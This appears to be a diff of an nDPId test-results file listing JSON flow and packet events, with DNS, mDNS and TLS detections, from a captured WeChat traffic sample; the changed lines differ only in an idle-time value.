+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167337792,"flow_last_seen":1492167337792,"flow_idle_time":7560000,"flow_min_l4_payload_len":604,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":604,"midstream":1,"thread_ts_msec":1492167337792,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01281{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492167337792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":670,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":670,"pkt_l4_len":636,"thread_ts_msec":1492167337792,"pkt":"eJKcD6iO8IQvSpdgCABFoAKQLFpAACwG+e7LzZeiwKgBZwG700RsJQvmFiW5B4AYAQBhCAAAAQEICkXRlQMAMKrIjxNPGb1b2gIOFmmrodrIUGWpRD8pBe\/eyANOuHxnf1oEiCDKQxkU6yvgqiltC85O1YOlf4+boaZn\/v7U0TkR+lQ9a8XEdMtbUDNvRkN1lpLANNJe9T6WEXQRZhhQATyvHXIsPxznFQlv1ayF4fN0Lp1Tv+DnMtPovG4l64Fdnf94BKNh3wpUis\/1aaAJUl4N4QYAa2BN+MLHUIjBfzQomk58kbDVZlQvabo4eeiFrJQbG0CRtmIDLIV4UlMABwm2B+L0SD\/lX+vPdRjlbT0hOePKWkrPVp4oa0GnGMtovp\/3dKKj2adHC1yCvZqzc+T4heafDFJJDxNGnnTZtJeXWQW2\/Wn0xAXZa5xeVmiob7mVi7gQwqB4EyVdzoi+MdLqv1I0FdZ7WKuu9o+r6i7T5KxQ7NhUIRC9KEInuscbFfTp5tcTpkg81VRtJhveR07GYTrLSFchnUCEzbFpCOPEOlfHshGkgemcZqUW0JSeBZoVIhGHuP8IElk+zTdckKSFR7XZosRv+JZpXULghhsYEQIcWSnXEwiNwHqD7SkijDTYTSRARplFy3lQ+I9PYai9e3wxDdj38dt3ZjnYHW+Jgcvyxa81TfaFhCzMBo8JWYVcQLLQCzJJ7po8hcjxwSKSvs1BzLjoAmGIOQCY3cD2niwBo4mLwkfrwM7iYYbbTgCByxdl2XUzXKGTmMiV+yqiF1sadTUF0KDk8zQPlxqASeejWTULCaKDKO7zq0WMvrWWgtPS5+WycvqXy24tfwXRN6su4lzlC8cmzA\/wzbACdxOu6m0puRk6CDMzrA=="} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492167337792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167337792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0B7NAAEAGDZLAqAFny82XotNEAbsWJbkHbCUOQoAQAk6qQAAAAQEICgAwqxZF0ZUD"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1492167338426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167338426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuMlAAAERHdXAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 
00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
@@ -18,20 +18,20 @@ 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1492167342893,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1492167342893,"pkt":"eJKcD6iO8IQvSpdgCABFoAECAABAAEARtJXAqAH+wKgBZwA10eYA7qtlPBmBgAABAAIABAAEDHNhZmVicm93c2luZxFnb29nbGV1c2VyY29udGVudANjb20AAAEAAcAMAAUAAQAANssADgJzYgFsBmdvb2dsZcArwEAAAQABAAAAxwAErNkWDsBDAAIAAQAACYwABgNuczHARcBDAAIAAQAACYwABgNuczTARcBDAAIAAQAACYwABgNuczLARcBDAAIAAQAACYwABgNuczPARcBqAAEAAQABNLQABNjvIArAjgABAAEAATS0AATY7yIKwKAAAQABAAE0tAAE2O8kCsB8AAEAAQABNLQABNjvJgo="} 
00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.14"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342893,"flow_last_seen":1492167342893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1492167342893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342893,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8j4ZAAEAGJj\/AqAFnrNkWDpcBAbvnsj+XAAAAAKACchDgsAAAAgQFtAQCCAoAMLARAAAAAAEDAwc="} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1492167342941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342941,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8xIIAADIGPqOs2RYOwKgBZwG7lwHnJuhS57I\/mKASpajHRwAAAgQFZAQCCApd2bi8ADCwEQEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1492167342941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167342941,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0j4dAAEAGJkbAqAFnrNkWDpcBAbvnsj+Y5yboU4AQAOWaewAAAQEICgAwsB1d2bi8"} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167342893,"flow_last_seen":1492167342942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1492167342942,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167342893,"flow_last_seen":1492167342995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1492167342995,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1"}} -02015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167342893,"flow_last_seen":1492167342997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4434,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1492167342997,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","server_names":"*.googleusercontent.com,*.apps.googleusercontent.com,*.appspot.com.storage.googleapis.com,*.blogspot.com,*.bp.blogspot.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.doubleclickusercontent.com,*.ggpht.com,*.googledrive.com,*.googlesyndication.com,*.googleweblight.com,*.safenup.googleusercontent.com,*.sandbox.googleusercontent.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.googleapis.com,*.storage.select.googleapis.com,blogspot.com,bp.blogspot.com,commondatastorage.googleapis.com,doubleclickusercontent.com,ggpht.com,googledrive.com,googleusercontent.com,googleweblight.com,static.panoramio.com.storage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.googleusercontent.com","alpn":"h2,http\/1.1","fingerprint":"8B:36:AF:31:A2:4C:EE:50:CC:6F:34:F7:2C:A3:C5:B6:4B:02:AC:53"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0u5hAAEAGF5PAqAFn2DrNTroLAbv4cm+uICz91YAQATUbzAAAAQEICgAwswD2qQZf"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ew1AAEAGOYDAqAFnrNkXTs\/kAbv7Pa3ZiiWYPIAQAT3Z6QAAAQEICgAwswB+x0ZO"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1492167345935,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345935,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0XCMAADcGv2jYOs1OwKgBZwG7ugsgLP3V+HJvr4AQAV1HoAAAAQEICvaptmIAL9cA"} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1492167345937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345937,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0vmsAADcGPoKs2RdOwKgBZwG7z+SKJZg8+z2t2oAQAVQFzwAAAQEICn7H9k8AL9cC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492167347435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167347435,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0LFtAACwG\/EnLzZeiwKgBZwG700RsJQ5CFiW5B4ARAQCiIgAAAQEICkXRnm4AMKsW"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342893,"flow_last_seen":1492167342893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1492167342893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342893,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8j4ZAAEAGJj\/AqAFnrNkWDpcBAbvnsj+XAAAAAKACchDgsAAAAgQFtAQCCAoAMLARAAAAAAEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1492167342941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342941,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8xIIAADIGPqOs2RYOwKgBZwG7lwHnJuhS57I\/mKASpajHRwAAAgQFZAQCCApd2bi8ADCwEQEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1492167342941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167342941,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0j4dAAEAGJkbAqAFnrNkWDpcBAbvnsj+Y5yboU4AQAOWaewAAAQEICgAwsB1d2bi8"} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167342893,"flow_last_seen":1492167342942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1492167342942,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167342893,"flow_last_seen":1492167342995,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1492167342995,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1"}} +02015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167342893,"flow_last_seen":1492167342997,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4434,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1492167342997,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","server_names":"*.googleusercontent.com,*.apps.googleusercontent.com,*.appspot.com.storage.googleapis.com,*.blogspot.com,*.bp.blogspot.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.doubleclickusercontent.com,*.ggpht.com,*.googledrive.com,*.googlesyndication.com,*.googleweblight.com,*.safenup.googleusercontent.com,*.sandbox.googleusercontent.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.googleapis.com,*.storage.select.googleapis.com,blogspot.com,bp.blogspot.com,commondatastorage.googleapis.com,doubleclickusercontent.com,ggpht.com,googledrive.com,googleusercontent.com,googleweblight.com,static.panoramio.com.storage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.googleusercontent.com","alpn":"h2,http\/1.1","fingerprint":"8B:36:AF:31:A2:4C:EE:50:CC:6F:34:F7:2C:A3:C5:B6:4B:02:AC:53"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0u5hAAEAGF5PAqAFn2DrNTroLAbv4cm+uICz91YAQATUbzAAAAQEICgAwswD2qQZf"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ew1AAEAGOYDAqAFnrNkXTs\/kAbv7Pa3ZiiWYPIAQAT3Z6QAAAQEICgAwswB+x0ZO"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1492167345935,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345935,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0XCMAADcGv2jYOs1OwKgBZwG7ugsgLP3V+HJvr4AQAV1HoAAAAQEICvaptmIAL9cA"} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1492167345937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345937,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0vmsAADcGPoKs2RdOwKgBZwG7z+SKJZg8+z2t2oAQAVQFzwAAAQEICn7H9k8AL9cC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492167347435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167347435,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0LFtAACwG\/EnLzZeiwKgBZwG700RsJQ5CFiW5B4ARAQCiIgAAAQEICkXRnm4AMKsW"} 